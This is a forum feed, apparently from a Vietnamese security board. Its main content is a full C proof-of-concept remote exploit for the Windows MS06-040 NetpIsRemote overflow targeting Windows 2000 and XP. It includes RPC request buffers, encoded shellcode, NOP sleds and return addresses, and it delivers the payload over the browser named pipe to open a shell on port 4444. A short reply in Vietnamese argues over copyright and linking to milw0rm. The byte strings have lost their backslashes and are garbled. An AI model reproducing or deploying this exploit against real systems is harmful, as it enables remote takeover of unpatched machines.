<![CDATA[Latest posts for the topic "MS Windows NetpIsRemote() Remote Overflow (MS06-040)"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net MS Windows NetpIsRemote() Remote Overflow (MS06-040) Code:
/*
 * MS06-040 Remote Code Execution Proof of Concept
 *
 * Ported by ub3r st4r aka iRP
 * ---------------------------------------------------------------------
 * Tested Against:
 *  Windows XP SP1
 *  Windows 2000 SP4
 *
 * Systems Affected:
 *  Microsoft Windows 2000 SP0-SP4
 *  Microsoft Windows XP SP0-SP1
 *  Microsoft Windows NT 4.0
 * ---------------------------------------------------------------------
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * PRIVATE v.0.2 (08-27-06)
 */

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
      
"x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
      
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
      
"xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
      
"x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
       "x2Bx10x48x60x02x00x00x00";

// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
      
"x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
      
"x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
       "x00x00x00x00x01x00x00x00x00x00x00x00";

       // path ...

unsigned char DCERPC_Request_RPC_Service_[] =
      
"xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
       "x00x00x00x00xfax00x00x00x00x00x00x00";

unsigned char sc[] =
      
"x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
      
"x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
      
"xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
      
"x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
      
"x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
      
"x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
      
"x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
      
"xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
      
"x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
      
"xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
      
"xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
      
"x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
      
"xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
      
"xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
      
"xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
      
"x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
      
"xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
      
"x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
      
"xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
      
"x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
      
"x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
       "xf8x67x66x77xf0xdbx57x41x6fx58";

int main(int argc, char* argv[])
{
       HANDLE hFile;
       NETRESOURCE nr;

       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];

       unsigned int i;

       unsigned char szInBuf[4096];
       unsigned long dwRead, nWritten;

       unsigned char szReqBuf[2096];

       if (argc < 3){
               printf("[-] Usage: ms06040poc <host>
[target]n");
               printf("t1 - Windows 2000 SP0-SP4n");
               printf("t2 - Windows XP SP0-SP1n");
               return -1;
       }

       memset(szReqBuf, 0, sizeof(szReqBuf));

       if (atoi(argv[2]) == 1) {
               unsigned char szBuff[1064];

               // build payload buffer
               memset(szBuff, 'x90', 1000);
               memcpy(szBuff+630, sc, sizeof(sc));

               for(i=1000; i<1064; i+=4) {
                       memcpy(szBuff+i, "x04x08x02x00", 4);
               }

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x15x02x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x15x02x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+1120, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
               memcpy(szReqBuf+1140 , "xebx02", 2);
       }
       if (atoi(argv[2]) == 2) {
               unsigned char szBuff[708];

               memset(szBuff, 'x90', 612); /* size of shellcode */
               memcpy(szBuff, sc, sizeof(sc));

               memcpy(szBuff+612, "x0ax08x02x00", 4);
               memset(szBuff+616, 'A', 8); // 8 bytes padding
               memcpy(szBuff+624, "x04x08x02x00", 4);
               memset(szBuff+628, 'x90', 32);
               memcpy(szBuff+660, "x04x08x02x00", 4);
               memset(szBuff+664, 'B', 8); // 8 bytes padding
               memcpy(szBuff+672, "x04x08x02x00", 4);
               memset(szBuff+676, 'x90', 32);

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x63x01x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x63x01x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+764, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
       }

       printf("[+] Connecting to %s ... n", argv[1]);

       _snprintf(szRemoteName, sizeof(szRemoteName),
"\\%s\ipc$", argv[1]);
       nr.dwType = RESOURCETYPE_ANY;
       nr.lpLocalName = NULL;
       nr.lpProvider = NULL;
       nr.lpRemoteName = szRemoteName;
       if (WNetAddConnection2(&nr, "", "", 0) !=
NO_ERROR) {
               printf("[-] Failed to connect to host !n");
               return -1;
       }

       _snprintf(szPipePath, sizeof(szPipePath),
"\\%s\pipe\browser", argv[1]);
       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);

       if (hFile == INVALID_HANDLE_VALUE) {
               printf("[-] Failed to open named pipe !n");
               return -1;
       }

       printf("[+] Binding to RPC interface ... n");
       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service,
sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL)
== 0) {
               printf("[-] Failed to bind to interface !n");
               CloseHandle(hFile);
               return -1;
       }

       printf("[+] Sending RPC request ... n");
       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
               printf("[-] Unable to transmit RPC request
!n");
               CloseHandle(hFile);
               return -1;
       }

       printf("[+] Now check for shell on %s:4444 !n",
argv[1]);

       return 0;
}
]]>
/hvaonline/posts/list/3334.html#19001 /hvaonline/posts/list/3334.html#19001 GMT
MS Windows NetpIsRemote() Remote Overflow (MS06-040) /hvaonline/posts/list/3334.html#19410 /hvaonline/posts/list/3334.html#19410 GMT MS Windows NetpIsRemote() Remote Overflow (MS06-040)

PHUCDOAN wrote:
Copyright!!!!!!!!! Phúc còn nhớ lúc trước pác BigBall_Hacker post 1 bài tương tự nhưng nhận được sự phản ứng kịch liệt từ MOD (tạo rác cho forum) thế nhưng mời anh Conmale xem lại bài này có khác gì không? Nếu có thể chỉ cần vậy thôi: http://milw0rm.com/exploits/2265 mọi người có thể tìm đến mà 
Tớ nghĩ là dòng màu cam cũng đủ để là bản quyền ! nếu chỉ cần post link thì người đọc mất công nhấp thêm 1 click nữa rồi mới xem được ... nói chung ! Tốt nhất vửa post nội dung , vừa post link :))
/* * MS06-040 Remote Code Execution Proof of Concept * * Ported by ub3r st4r aka iRP * --------------------------------------------------------------------- * Tested Against: * Windows XP SP1 * Windows 2000 SP4 * 
]]>
/hvaonline/posts/list/3334.html#19453 /hvaonline/posts/list/3334.html#19453 GMT